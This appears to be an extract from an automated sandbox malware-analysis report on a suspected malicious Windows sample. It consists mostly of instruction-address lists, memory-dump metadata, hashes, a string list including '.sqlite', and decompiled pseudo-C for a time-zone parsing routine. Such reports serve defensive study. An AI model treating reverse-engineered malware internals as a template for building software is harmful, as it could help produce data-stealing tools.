                                    0x00829399
                                    0x00829407
                                    0x00829407
                                    0x0082940b
                                    0x0082940b
                                    0x00829410
                                    0x00829412
                                    0x0082941b
                                    0x0082941e
                                    0x00829421
                                    0x00829426
                                    0x00829426
                                    0x0082942b
                                    0x0082942d
                                    0x00829436
                                    0x00829439
                                    0x0082943c
                                    0x00829441
                                    0x00829441
                                    0x00829446
                                    0x00829448
                                    0x0082944e
                                    0x00829451
                                    0x00829454
                                    0x00829459
                                    0x00829459
                                    0x0082945c
                                    0x00829465
                                    0x00829467
                                    0x00829470
                                    0x00829473
                                    0x00829476
                                    0x00829476
                                    0x0082947f
                                    0x00000000
                                    0x00829485
                                    0x0082948b
                                    0x00829495
                                    0x0082949f
                                    0x008294a8
                                    0x008294aa
                                    0x008294af
                                    0x008294b6
                                    0x008294bf
                                    0x008294c6
                                    0x008294cb
                                    0x008294d2
                                    0x008294d3
                                    0x008294e5
                                    0x008294e6
                                    0x008294e7
                                    0x008294e9
                                    0x008294ea
                                    0x008294ef
                                    0x008294f6
                                    0x008294fb
                                    0x008294fe
                                    0x008294d3
                                    0x00829506
                                    0x00829517
                                    0x00829517
                                    0x00829521
                                    0x00829526
                                    0x0082952a
                                    0x00829531
                                    0x0082953c
                                    0x00829547
                                    0x0082954a
                                    0x00829554
                                    0x00829559
                                    0x0082955f
                                    0x00829563
                                    0x0082956a
                                    0x008298f9
                                    0x008298fe
                                    0x00829905
                                    0x0082990c
                                    0x00829912
                                    0x00829919
                                    0x0082991e
                                    0x00829926
                                    0x00829928
                                    0x0082992b
                                    0x00829933
                                    0x00829938
                                    0x0082993e
                                    0x00829943
                                    0x0082994a
                                    0x0082994f
                                    0x00829926
                                    0x00829952
                                    0x00829958
                                    0x00829969
                                    0x00829969
                                    0x00829973
                                    0x00829978
                                    0x0082997c
                                    0x00829981
                                    0x00829986
                                    0x00829989
                                    0x0082998e
                                    0x00829992
                                    0x00829999
                                    0x0082999c
                                    0x008299a4
                                    0x008299a7
                                    0x008299aa
                                    0x008299af
                                    0x008299b1
                                    0x00829a15
                                    0x00829a15
                                    0x00829a19
                                    0x00829a19
                                    0x00829a1c
                                    0x00829a1e
                                    0x00829a20
                                    0x00829a20
                                    0x00829a25
                                    0x00829a28
                                    0x00829a2b
                                    0x00829a2e
                                    0x00829a33
                                    0x00829a33
                                    0x00829a36
                                    0x00829a38
                                    0x00829a3a
                                    0x00829a3a
                                    0x00829a3d
                                    0x00829a43
                                    0x00829a46
                                    0x00829a49
                                    0x00829a4e
                                    0x00829a4e
                                    0x00829a51
                                    0x00829a53
                                    0x00829a55
                                    0x00829a55
                                    0x00829a58
                                    0x00829a5b
                                    0x00829a5e
                                    0x00829a61
                                    0x00829a66
                                    0x00829a66
                                    0x00829a69
                                    0x00829a70
                                    0x00829a72
                                    0x00829a74
                                    0x00829a74
                                    0x00829a77
                                    0x00829a7d
                                    0x00829a80
                                    0x00829a83
                                    0x00829a83
                                    0x00829a88
                                    0x00829a8c
                                    0x00829e3e
                                    0x00829e43
                                    0x00829e4d
                                    0x00829e57
                                    0x00829e5e
                                    0x00829e64
                                    0x00829e6b
                                    0x00829e70
                                    0x00829e77
                                    0x00829e78
                                    0x00829e8a
                                    0x00829e8b
                                    0x00829e8c
                                    0x00829e8d
                                    0x00829e92
                                    0x00829e99
                                    0x00829e9e
                                    0x00829e78
                                    0x00829e9f
                                    0x00829ea6
                                    0x00829eb7
                                    0x00829eb7
                                    0x00829ec1
                                    0x00829ec3
                                    0x00829ec8
                                    0x00829ecc
                                    0x00829ed3
                                    0x00829ede
                                    0x00829ee9
                                    0x00829eec
                                    0x00829ef6
                                    0x00829efb
                                    0x00829f01
                                    0x00829f05
                                    0x00829f0a
                                    0x00829f0c
                                    0x0082a297
                                    0x0082a297
                                    0x00000000
                                    0x0082a297
                                    0x00829f12
                                    0x00829f19
                                    0x00829f23
                                    0x00829f2f
                                    0x00829f3c
                                    0x00829f3f
                                    0x00829f47
                                    0x00829f55
                                    0x00829f64
                                    0x00829f69
                                    0x00829f6c
                                    0x00829f6e
                                    0x00829f70
                                    0x00829f76
                                    0x00829f7d
                                    0x00829f7d
                                    0x00829f82
                                    0x00829f88
                                    0x00829f8d
                                    0x00829f9b
                                    0x00829fa7
                                    0x00829fac
                                    0x00829faf
                                    0x00829fb1
                                    0x00829fb3
                                    0x00829fb9
                                    0x00829fc0
                                    0x00829fc0
                                    0x00829fcb
                                    0x00829fd0
                                    0x00829fdc
                                    0x00829fe5
                                    0x00829fee
                                    0x00829ff2
                                    0x00829ffa
                                    0x00829ffe
                                    0x0082a003
                                    0x0082a00f
                                    0x0082a018
                                    0x0082a01e
                                    0x0082a027
                                    0x0082a02d
                                    0x0082a031
                                    0x0082a036
                                    0x0082a03b
                                    0x0082a042
                                    0x0082a04d
                                    0x0082a052
                                    0x0082a055
                                    0x0082a059
                                    0x0082a05e
                                    0x0082a060
                                    0x00000000
                                    0x0082a066
                                    0x0082a066
                                    0x0082a06d
                                    0x0082a075
                                    0x0082a07b
                                    0x0082a086
                                    0x0082a090
                                    0x0082a099
                                    0x0082a0a6
                                    0x0082a0b3
                                    0x0082a0bd
                                    0x0082a0c9
                                    0x0082a0cd
                                    0x0082a0d8
                                    0x0082a0e3
                                    0x0082a0ee
                                    0x0082a0f6
                                    0x0082a0fa
                                    0x0082a0ff
                                    0x0082a105
                                    0x0082a107
                                    0x0082a10a
                                    0x0082a10d
                                    0x0082a110
                                    0x0082a113
                                    0x0082a118
                                    0x0082a120
                                    0x0082a12a
                                    0x0082a130
                                    0x0082a133
                                    0x0082a13f
                                    0x0082a144
                                    0x0082a145
                                    0x0082a149
                                    0x0082a151
                                    0x0082a15b
                                    0x0082a163
                                    0x0082a16a
                                    0x0082a18c
                                    0x0082a191
                                    0x0082a197
                                    0x0082a19d
                                    0x0082a1a9
                                    0x0082a1c8
                                    0x0082a1d5
                                    0x0082a1df
                                    0x0082a1e8
                                    0x0082a1f4
                                    0x0082a1f9
                                    0x0082a1ff
                                    0x0082a207
                                    0x0082a20a
                                    0x0082a214
                                    0x0082a220
                                    0x0082a224
                                    0x0082a22f
                                    0x0082a237
                                    0x0082a242
                                    0x0082a24d
                                    0x0082a255
                                    0x0082a259
                                    0x0082a25e
                                    0x0082a267
                                    0x0082a269
                                    0x0082a26d
                                    0x0082a270
                                    0x0082a273
                                    0x0082a278
                                    0x0082a27b
                                    0x0082a27f
                                    0x0082a284
                                    0x0082a288
                                    0x0082a28b
                                    0x0082a290
                                    0x00000000
                                    0x0082a290
                                    0x00829ea8
                                    0x00829ea8
                                    0x00829eaa
                                    0x00829eaa
                                    0x00829eb1
                                    0x00829eb2
                                    0x00829eb2
                                    0x00000000
                                    0x00829eaa
                                    0x00829a92
                                    0x00829a92
                                    0x00829a98
                                    0x00829a9c
                                    0x00829aa7
                                    0x00829ab3
                                    0x00829ab9
                                    0x00829ac0
                                    0x00829ac3
                                    0x00829acb
                                    0x00829ad9
                                    0x00829ae8
                                    0x00829aed
                                    0x00829af0
                                    0x00829af2
                                    0x00829af4
                                    0x00829afa
                                    0x00829b01
                                    0x00829b01
                                    0x00829b06
                                    0x00829b0c
                                    0x00829b11
                                    0x00829b1f
                                    0x00829b2b
                                    0x00829b30
                                    0x00829b33
                                    0x00829b35
                                    0x00829b37
                                    0x00829b3d
                                    0x00829b44
                                    0x00829b44
                                    0x00829b4f
                                    0x00829b54
                                    0x00829b60
                                    0x00829b69
                                    0x00829b72
                                    0x00829b76
                                    0x00829b7e
                                    0x00829b82
                                    0x00829b87
                                    0x00829b93
                                    0x00829b9c
                                    0x00829ba2
                                    0x00829bae
                                    0x00829bb7
                                    0x00829bbb
                                    0x00829bc0
                                    0x00829bc5
                                    0x00829bcc
                                    0x00829bd7
                                    0x00829bdc
                                    0x00829bdf
                                    0x00829be3
                                    0x00829be8
                                    0x00829bea
                                    0x00829e28
                                    0x00829e28
                                    0x00829e28
                                    0x00000000
                                    0x00829bf0
                                    0x00829bf0
                                    0x00829bf7
                                    0x00829bfc
                                    0x00829c02
                                    0x00829c0d
                                    0x00829c17
                                    0x00829c20
                                    0x00829c2d
                                    0x00829c3a
                                    0x00829c44
                                    0x00829c50
                                    0x00829c54
                                    0x00829c5f
                                    0x00829c6a
                                    0x00829c75
                                    0x00829c7d
                                    0x00829c81
                                    0x00829c86
                                    0x00829c8c
                                    0x00829c8e
                                    0x00829c91
                                    0x00829c94
                                    0x00829c97
                                    0x00829c9a
                                    0x00829c9f
                                    0x00829ca7
                                    0x00829cb1
                                    0x00829cb7
                                    0x00829cba
                                    0x00829cc6
                                    0x00829ccb
                                    0x00829ccc
                                    0x00829cd0
                                    0x00829cd8
                                    0x00829ce2
                                    0x00829cea
                                    0x00829cf1
                                    0x00829d13
                                    0x00829d18
                                    0x00829d1e
                                    0x00829d24
                                    0x00829d30
                                    0x00829d4f
                                    0x00829d5c
                                    0x00829d66
                                    0x00829d6f
                                    0x00829d7b
                                    0x00829d80
                                    0x00829d80
                                    0x00829d86
                                    0x00829d8e
                                    0x00829d91
                                    0x00829d9b
                                    0x00829da7
                                    0x00829dab
                                    0x00829db6
                                    0x00829dbe
                                    0x00829dc9
                                    0x00829dd4
                                    0x00829ddc
                                    0x00829de0
                                    0x00829de5
                                    0x00829dee
                                    0x00829df0
                                    0x00829df4
                                    0x00829df7
                                    0x00829dfa
                                    0x00829dff
                                    0x00829e02
                                    0x00829e06
                                    0x00829e08
                                    0x00829e0e
                                    0x00829e12
                                    0x00829e17
                                    0x00829e19
                                    0x00829e19
                                    0x00829e1a
                                    0x00829e1a
                                    0x00829e1e
                                    0x00829e23
                                    0x00829e2a
                                    0x00829e34
                                    0x00000000
                                    0x00829e34
                                    0x00829bea
                                    0x00829a8c
                                    0x008299ba
                                    0x008299cb
                                    0x008299d0
                                    0x008299da
                                    0x008299dd
                                    0x008299de
                                    0x008299e1
                                    0x008299ea
                                    0x008299f2
                                    0x008299f5
                                    0x008299fc
                                    0x00829a03
                                    0x00829a06
                                    0x00829a09
                                    0x00829a0e
                                    0x00829a11
                                    0x00829a13
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0082995a
                                    0x0082995a
                                    0x0082995c
                                    0x0082995c
                                    0x00829963
                                    0x00829964
                                    0x00829964
                                    0x00000000
                                    0x0082995c
                                    0x00829958
                                    0x00829570
                                    0x00829576
                                    0x0082957a
                                    0x00829584
                                    0x00829590
                                    0x00829596
                                    0x0082959d
                                    0x008295a0
                                    0x008295a3
                                    0x008295ab
                                    0x008295b9
                                    0x008295c8
                                    0x008295cd
                                    0x008295d2
                                    0x008295d4
                                    0x008295da
                                    0x008295e1
                                    0x008295e1
                                    0x008295e6
                                    0x008295ec
                                    0x008295f1
                                    0x008295f2
                                    0x00829600
                                    0x0082960c
                                    0x00829611
                                    0x00829616
                                    0x00829618
                                    0x0082961e
                                    0x00829625
                                    0x00829625
                                    0x00829630
                                    0x00829635
                                    0x00829641
                                    0x0082964a
                                    0x00829653
                                    0x00829657
                                    0x0082965f
                                    0x00829663
                                    0x00829668
                                    0x00829674
                                    0x00829680
                                    0x00829686
                                    0x00829692
                                    0x0082969b
                                    0x0082969f
                                    0x008296a4
                                    0x008296ac
                                    0x008296b3
                                    0x008296be
                                    0x008296c3
                                    0x008296c9
                                    0x008296cd
                                    0x008296d2
                                    0x008296d4
                                    0x00000000
                                    0x008296da
                                    0x008296da
                                    0x008296e1
                                    0x008296e9
                                    0x008296ec
                                    0x008296f7
                                    0x008296fe
                                    0x00829707
                                    0x00829714
                                    0x00829721
                                    0x0082972b
                                    0x00829737
                                    0x0082973b
                                    0x00829746
                                    0x00829751
                                    0x00829759
                                    0x00829761
                                    0x00829765
                                    0x0082976a
                                    0x00829770
                                    0x00829772
                                    0x00829775
                                    0x00829778
                                    0x0082977b
                                    0x0082977e
                                    0x00829787
                                    0x00829791
                                    0x00829797
                                    0x0082979a
                                    0x008297a6
                                    0x008297ab
                                    0x008297ac
                                    0x008297b0
                                    0x008297b8
                                    0x008297c2
                                    0x008297ca
                                    0x008297d1
                                    0x008297f3
                                    0x008297f8
                                    0x008297fb
                                    0x00829801
                                    0x0082980d
                                    0x0082982c
                                    0x00829839
                                    0x00829843
                                    0x0082984c
                                    0x00829858
                                    0x0082985d
                                    0x00829860
                                    0x00829868
                                    0x0082986b
                                    0x00829875
                                    0x00829881
                                    0x00829885
                                    0x00829890
                                    0x00829898
                                    0x008298a3
                                    0x008298ae
                                    0x008298b6
                                    0x008298ba
                                    0x008298bf
                                    0x008298c8
                                    0x008298ca
                                    0x008298ce
                                    0x008298d1
                                    0x008298d4
                                    0x008298d9
                                    0x008298dc
                                    0x008298e0
                                    0x008298e5
                                    0x008298e9
                                    0x008298ec
                                    0x00000000
                                    0x008298f3
                                    0x00829508
                                    0x00829508
                                    0x0082950a
                                    0x0082950a
                                    0x00829511
                                    0x00829512
                                    0x00000000
                                    0x0082950a
                                    0x00829506
                                    0x0082947f
                                    0x008293a2
                                    0x008293a5
                                    0x008293aa
                                    0x008293b1
                                    0x008293b9
                                    0x008293be
                                    0x008293c1
                                    0x008293cc
                                    0x008293d9
                                    0x008293dc
                                    0x008293e1
                                    0x008293e4
                                    0x008293ee
                                    0x00829402
                                    0x00829402
                                    0x00000000
                                    0x00829402
                                    0x008293f2
                                    0x008293f7
                                    0x008293f9
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x008293f9
                                    0x0082a2d9
                                    0x0082a2db
                                    0x0082a2df
                                    0x0082a2df
                                    0x0082a2e4
                                    0x0082a2ea
                                    0x0082a2ec
                                    0x0082a2ee
                                    0x0082a2ee
                                    0x0082a2f6
                                    0x0082a301
                                    0x0082a30c
                                    0x00000000

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$DeallocateEnterLeave$ConditionVariableWake
                                    • String ID: (size: $.$.$.sqlite$@$M$ZO$bAIG$jOZO$mAAEGK].
                                    • API String ID: 4060657020-1872904414
                                    • Opcode ID: 049d799ae1bb78f553f1ce55ca0948f412b9cdcc0e14ef4ba591afdfa7f6afdc
                                    • Instruction ID: 1c7308873cb3a828da554972347e4fdf68fa29f07a76798add0a9dc2a8643e6a
                                    • Opcode Fuzzy Hash: 049d799ae1bb78f553f1ce55ca0948f412b9cdcc0e14ef4ba591afdfa7f6afdc
                                    • Instruction Fuzzy Hash: 71B27A70D00268DADF15EBA8D951BEDBBB4FF15300F1041A9E04AB7292DB745F89CB62
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00883A19 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 373timeCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 3620 883a19-883a41 call 88072a call 880788 3625 883be7-883c1c call 873556 call 88072a call 880788 3620->3625 3626 883a47-883a53 call 880730 3620->3626 3649 883c22-883c2e call 880730 3625->3649 3650 883d44-883e02 call 873556 call 876159 3625->3650 3626->3625 3631 883a59-883a64 3626->3631 3634 883a9a-883aa3 call 880123 3631->3634 3635 883a66-883a68 3631->3635 3645 883aa6-883aab 3634->3645 3638 883a6a-883a6e 3635->3638 3641 883a8a-883a8c 3638->3641 3642 883a70-883a72 3638->3642 3644 883a8f-883a91 3641->3644 3646 883a74-883a7a 3642->3646 3647 883a86-883a88 3642->3647 3651 883be3-883be6 3644->3651 3652 883a97 3644->3652 3645->3645 3653 883aad-883ace call 88255c call 880123 3645->3653 3646->3641 3648 883a7c-883a84 3646->3648 3647->3644 3648->3638 3648->3647 3649->3650 3660 883c34-883c40 call 88075c 3649->3660 3675 883e12 3650->3675 3676 883e04-883e07 3650->3676 3652->3634 3653->3651 3668 883ad4-883ad7 3653->3668 3660->3650 3669 883c46-883c67 call 880123 GetTimeZoneInformation 3660->3669 3671 883ada-883adf 3668->3671 3683 883c6d-883c8e 3669->3683 3684 883d22-883d43 call 880724 call 880718 call 88071e 3669->3684 3671->3671 3672 883ae1-883af3 call 87f6d3 3671->3672 3672->3625 3687 883af9-883b0c call 88e29b 3672->3687 3681 883e17-883e2c call 880123 call 86e288 3675->3681 3682 883e12 call 883bf4 3675->3682 3676->3675 3679 883e09-883e10 call 883a19 3676->3679 3679->3681 3682->3681 3689 883c98-883c9f 3683->3689 3690 883c90-883c95 3683->3690 3687->3625 3704 883b12-883b15 3687->3704 3691 883cb1-883cb3 3689->3691 3692 883ca1-883ca8 3689->3692 3690->3689 3698 883cb5-883cde call 876b0a call 88749b 3691->3698 3692->3691 3697 883caa-883caf 3692->3697 3697->3698 3716 883cec-883cee 3698->3716 3717 883ce0-883ce3 3698->3717 3708 883b1d-883b23 3704->3708 3709 883b17-883b1b 3704->3709 3712 883b25 3708->3712 3713 883b26-883b33 call 876aab 3708->3713 3709->3704 3709->3708 3712->3713 3721 883b36-883b3b 3713->3721 3720 883cf0-883d0e call 88749b 3716->3720 3717->3716 3719 883ce5-883cea 3717->3719 3719->3720 3729 883d1d-883d20 3720->3729 3730 883d10-883d13 3720->3730 3723 883b3d-883b42 3721->3723 3724 883b44-883b45 3721->3724 3723->3724 3726 883b47-883b4a 3723->3726 3724->3721 3727 883b98-883b9b 3726->3727 3728 883b4c-883b63 call 876aab 3726->3728 3732 883b9d-883b9f 3727->3732 3733 883ba2-883bb6 3727->3733 3739 883b65 3728->3739 3740 883b77-883b79 3728->3740 3729->3684 3730->3729 3734 883d15-883d1b 3730->3734 3732->3733 3735 883bb8-883bc8 call 88e29b 3733->3735 3736 883bcc 3733->3736 3734->3684 3735->3625 3746 883bca 3735->3746 3741 883bcf-883be1 call 880724 call 880718 3736->3741 3743 883b67-883b6c 3739->3743 3740->3727 3745 883b7b-883b8b call 876aab 3740->3745 3741->3651 3743->3740 3747 883b6e-883b75 3743->3747 3753 883b92-883b96 3745->3753 3746->3741 3747->3740 3747->3743 3753->3727 3754 883b8d-883b8f 3753->3754 3754->3727 3755 883b91 3754->3755 3755->3753
                                    C-Code - Quality: 80%
                                    			E00883A19(void* __eflags, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v20;
				signed int _v24;
				char _v52;
				char _v60;
				char _v64;
				signed int _v100;
				char _v272;
				intOrPtr _v276;
				char _v280;
				char _v356;
				char _v360;
				void* __ebp;
				signed int _t61;
				signed int _t68;
				signed int _t70;
				signed int _t74;
				void* _t76;
				signed int _t81;
				signed int _t85;
				signed int _t87;
				long _t89;
				signed int* _t92;
				signed int _t93;
				signed int _t96;
				signed int _t99;
				signed int _t103;
				signed int _t106;
				void* _t110;
				signed int _t113;
				void* _t114;
				void* _t116;
				void* _t117;
				char* _t123;
				signed int* _t125;
				signed int _t126;
				intOrPtr _t129;
				void* _t131;
				signed int _t132;
				signed int _t133;
				void* _t136;
				intOrPtr _t137;
				void* _t139;
				void* _t144;
				char _t147;
				signed int _t150;
				signed int _t154;
				signed int _t157;
				signed int _t158;
				intOrPtr* _t164;
				intOrPtr _t165;
				signed int _t166;
				intOrPtr* _t167;
				void* _t168;
				void* _t169;
				signed int _t172;
				signed int _t175;
				intOrPtr* _t176;
				signed int _t180;
				signed int _t181;
				void* _t188;
				signed int _t189;
				void* _t190;
				signed int _t191;

				_t61 = E0088072A();
				_v8 = _v8 & 0x00000000;
				_t133 = _t61;
				_v12 = _v12 & 0x00000000;
				_v16 = _t133;
				if(E00880788( &_v8) != 0 || E00880730( &_v12) != 0) {
					L45:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E00873556();
					asm("int3");
					_t188 = _t190;
					_t191 = _t190 - 0x10;
					_push(_t133);
					_t176 = E0088072A();
					_v52 = 0;
					_v60 = 0;
					_v64 = 0;
					_t68 = E00880788( &_v52);
					_t139 = _t175;
					__eflags = _t68;
					if(_t68 != 0) {
						L65:
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E00873556();
						asm("int3");
						_push(_t188);
						_t189 = _t191;
						_t70 =  *0x8b2014; // 0x61232540
						_v100 = _t70 ^ _t189;
						 *0x8b2314 =  *0x8b2314 | 0xffffffff;
						 *0x8b2308 =  *0x8b2308 | 0xffffffff;
						_push(0);
						_push(_t176);
						_push(_t169);
						_t170 = 0;
						 *0x8b46f8 = 0;
						_t74 = E00876159(_t139, _t165, __eflags,  &_v360,  &_v356, 0x100, 0x89e0e8);
						__eflags = _t74;
						if(_t74 != 0) {
							__eflags = _t74 - 0x22;
							if(_t74 == 0x22) {
								_t181 = E0088255C(_t139, _v276);
								_pop(_t144);
								__eflags = _t181;
								if(__eflags != 0) {
									_t81 = E00876159(_t144, _t165, __eflags,  &_v280, _t181, _v276, 0x89e0e8);
									__eflags = _t81;
									if(_t81 == 0) {
										E00880123(0);
										_t170 = _t181;
									} else {
										_push(_t181);
										goto L71;
									}
								} else {
									_push(0);
									L71:
									E00880123();
								}
							}
						} else {
							_t170 =  &_v272;
						}
						asm("sbb esi, esi");
						_t180 =  ~(_t170 -  &_v272) & _t170;
						__eflags = _t170;
						if(_t170 == 0) {
							L79:
							L46(); // executed
						} else {
							__eflags =  *_t170;
							if(__eflags == 0) {
								goto L79;
							} else {
								_push(_t170);
								E00883A19(__eflags);
							}
						}
						_t76 = E00880123(_t180);
						__eflags = _v16 ^ _t189;
						return E0086E288(_t76, _v16 ^ _t189);
					} else {
						_t85 = E00880730( &_v20);
						_pop(_t139);
						__eflags = _t85;
						if(_t85 != 0) {
							goto L65;
						} else {
							_t87 = E0088075C( &_v24);
							_pop(_t139);
							__eflags = _t87;
							if(_t87 != 0) {
								goto L65;
							} else {
								E00880123( *0x8b46f4);
								 *0x8b46f4 = 0;
								 *_t191 = 0x8b4700; // executed
								_t89 = GetTimeZoneInformation(??); // executed
								__eflags = _t89 - 0xffffffff;
								if(_t89 != 0xffffffff) {
									_t166 =  *0x8b4700 * 0x3c;
									_t147 = 1;
									_push(_t169);
									_t172 =  *0x8b4754; // 0x0
									 *0x8b46f8 = 1;
									_v12 = _t166;
									__eflags =  *0x8b4746; // 0xa
									if(__eflags != 0) {
										_t106 = _t172 * 0x3c + _t166;
										__eflags = _t106;
										_v12 = _t106;
									}
									__eflags =  *0x8b479a; // 0x3
									if(__eflags == 0) {
										L55:
										_t93 = 0;
										_t147 = 0;
									} else {
										_t103 =  *0x8b47a8; // 0xffffffc4
										__eflags = _t103;
										if(_t103 == 0) {
											goto L55;
										} else {
											_t93 = (_t103 - _t172) * 0x3c;
										}
									}
									_v20 = _t147;
									_v24 = _t93;
									_t173 = L00876B0A(_t166);
									_t96 = E0088749B(_t94, 0, "W. Europe Standard Time", 0xffffffff,  *_t176, 0x3f, 0,  &_v16);
									__eflags = _t96;
									if(_t96 == 0) {
										L59:
										 *((char*)( *_t176)) = 0;
									} else {
										__eflags = _v16;
										if(_v16 != 0) {
											goto L59;
										} else {
											 *((char*)( *_t176 + 0x3f)) = 0;
										}
									}
									_t99 = E0088749B(_t173, 0, "W. Europe Daylight Time", 0xffffffff,  *((intOrPtr*)(_t176 + 4)), 0x3f, 0,  &_v16);
									__eflags = _t99;
									if(_t99 == 0) {
										L63:
										 *((char*)( *((intOrPtr*)(_t176 + 4)))) = 0;
									} else {
										__eflags = _v16;
										if(_v16 != 0) {
											goto L63;
										} else {
											 *((char*)( *((intOrPtr*)(_t176 + 4)) + 0x3f)) = 0;
										}
									}
								}
								 *(E00880724()) = _v12;
								 *((intOrPtr*)(E00880718())) = _v20;
								_t92 = E0088071E();
								 *_t92 = _v24;
								return _t92;
							}
						}
					}
				} else {
					_t167 =  *0x8b46f4; // 0x0
					_t175 = _a4;
					if(_t167 == 0) {
						L12:
						E00880123(_t167);
						_t150 = _t175;
						_t12 = _t150 + 1; // 0x1
						_t168 = _t12;
						do {
							_t110 =  *_t150;
							_t150 = _t150 + 1;
						} while (_t110 != 0);
						_t13 = _t150 - _t168 + 1; // 0x2
						 *0x8b46f4 = E0088255C(_t150 - _t168, _t13);
						_t113 = E00880123(0);
						_t165 =  *0x8b46f4; // 0x0
						if(_t165 == 0) {
							goto L44;
						} else {
							_t154 = _t175;
							_push(_t169);
							_t14 = _t154 + 1; // 0x1
							_t169 = _t14;
							do {
								_t114 =  *_t154;
								_t154 = _t154 + 1;
							} while (_t114 != 0);
							_t15 = _t154 - _t169 + 1; // 0x2
							_t116 = E0087F6D3(_t165, _t15, _t175);
							_t190 = _t190 + 0xc;
							if(_t116 == 0) {
								_t169 = 3;
								_push(_t169);
								_t117 = E0088E29B( *_t133, 0x40, _t175);
								_t190 = _t190 + 0x10;
								if(_t117 == 0) {
									while( *_t175 != 0) {
										_t175 = _t175 + 1;
										_t169 = _t169 - 1;
										if(_t169 != 0) {
											continue;
										}
										break;
									}
									_t133 =  *_t175;
									_pop(_t169);
									if(_t133 == 0x2d) {
										_t175 = _t175 + 1;
									}
									_t157 = E00876AAB(_t155, _t175) * 0xe10;
									_v8 = _t157;
									while(1) {
										_t165 =  *_t175;
										if(_t165 != 0x2b && _t165 - 0x30 > 9) {
											break;
										}
										_t175 = _t175 + 1;
									}
									__eflags = _t165 - 0x3a;
									if(_t165 == 0x3a) {
										_t175 = _t175 + 1;
										_t157 = _v8 + E00876AAB(_t157, _t175) * 0x3c;
										_t129 =  *_t175;
										_v8 = _t157;
										__eflags = _t129 - 0x30;
										if(_t129 >= 0x30) {
											_t165 = _t129;
											while(1) {
												_t129 = _t165;
												__eflags = _t165 - 0x39;
												if(_t165 > 0x39) {
													goto L32;
												}
												_t175 = _t175 + 1;
												_t129 =  *_t175;
												_t165 = _t129;
												__eflags = _t129 - 0x30;
												if(_t129 >= 0x30) {
													continue;
												}
												goto L32;
											}
										}
										L32:
										__eflags = _t129 - 0x3a;
										if(_t129 == 0x3a) {
											_t175 = _t175 + 1;
											_t157 = _v8 + E00876AAB(_t157, _t175);
											_v8 = _t157;
											while(1) {
												_t131 =  *_t175;
												__eflags = _t131 - 0x30;
												if(_t131 < 0x30) {
													goto L37;
												}
												__eflags = _t131 - 0x39;
												if(_t131 <= 0x39) {
													_t175 = _t175 + 1;
													__eflags = _t175;
													continue;
												}
												goto L37;
											}
										}
									}
									L37:
									__eflags = _t133 - 0x2d;
									if(_t133 == 0x2d) {
										_v8 =  ~_t157;
									}
									_t158 =  *_t175;
									__eflags = _t158;
									_v12 = 0 | _t158 != 0x00000000;
									_t123 =  *((intOrPtr*)(_v16 + 4));
									__eflags = _t158;
									if(_t158 == 0) {
										 *_t123 = 0;
										L43:
										 *(E00880724()) = _v8;
										_t125 = E00880718();
										 *_t125 = _v12;
										return _t125;
									}
									_push(3);
									_t126 = E0088E29B(_t123, 0x40, _t175);
									_t190 = _t190 + 0x10;
									__eflags = _t126;
									if(_t126 == 0) {
										goto L43;
									}
								}
							}
							goto L45;
						}
					} else {
						_t164 = _t167;
						_t132 = _t175;
						while(1) {
							_t136 =  *_t132;
							if(_t136 !=  *_t164) {
								break;
							}
							if(_t136 == 0) {
								L8:
								_t113 = 0;
							} else {
								_t137 =  *((intOrPtr*)(_t132 + 1));
								if(_t137 !=  *((intOrPtr*)(_t164 + 1))) {
									break;
								} else {
									_t132 = _t132 + 2;
									_t164 = _t164 + 2;
									if(_t137 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							if(_t113 == 0) {
								L44:
								return _t113;
							} else {
								_t133 = _v16;
								goto L12;
							}
							goto L81;
						}
						asm("sbb eax, eax");
						_t113 = _t132 | 0x00000001;
						__eflags = _t113;
						goto L10;
					}
				}
				L81:
			}





































































                                    0x00883a23
                                    0x00883a28
                                    0x00883a2c
                                    0x00883a2e
                                    0x00883a36
                                    0x00883a41
                                    0x00883be7
                                    0x00883be9
                                    0x00883bea
                                    0x00883beb
                                    0x00883bec
                                    0x00883bed
                                    0x00883bee
                                    0x00883bf3
                                    0x00883bf7
                                    0x00883bf9
                                    0x00883bfc
                                    0x00883c03
                                    0x00883c0a
                                    0x00883c0e
                                    0x00883c11
                                    0x00883c14
                                    0x00883c19
                                    0x00883c1a
                                    0x00883c1c
                                    0x00883d44
                                    0x00883d44
                                    0x00883d45
                                    0x00883d46
                                    0x00883d47
                                    0x00883d48
                                    0x00883d49
                                    0x00883d4e
                                    0x00883d51
                                    0x00883d52
                                    0x00883d5a
                                    0x00883d61
                                    0x00883d64
                                    0x00883d71
                                    0x00883d78
                                    0x00883d79
                                    0x00883d7a
                                    0x00883d80
                                    0x00883d8f
                                    0x00883d96
                                    0x00883d9e
                                    0x00883da0
                                    0x00883daa
                                    0x00883dad
                                    0x00883dba
                                    0x00883dbc
                                    0x00883dbd
                                    0x00883dbf
                                    0x00883dd8
                                    0x00883de0
                                    0x00883de2
                                    0x00883de8
                                    0x00883ded
                                    0x00883de4
                                    0x00883de4
                                    0x00000000
                                    0x00883de4
                                    0x00883dc1
                                    0x00883dc1
                                    0x00883dc2
                                    0x00883dc2
                                    0x00883dc2
                                    0x00883def
                                    0x00883da2
                                    0x00883da2
                                    0x00883da2
                                    0x00883dfc
                                    0x00883dfe
                                    0x00883e00
                                    0x00883e02
                                    0x00883e12
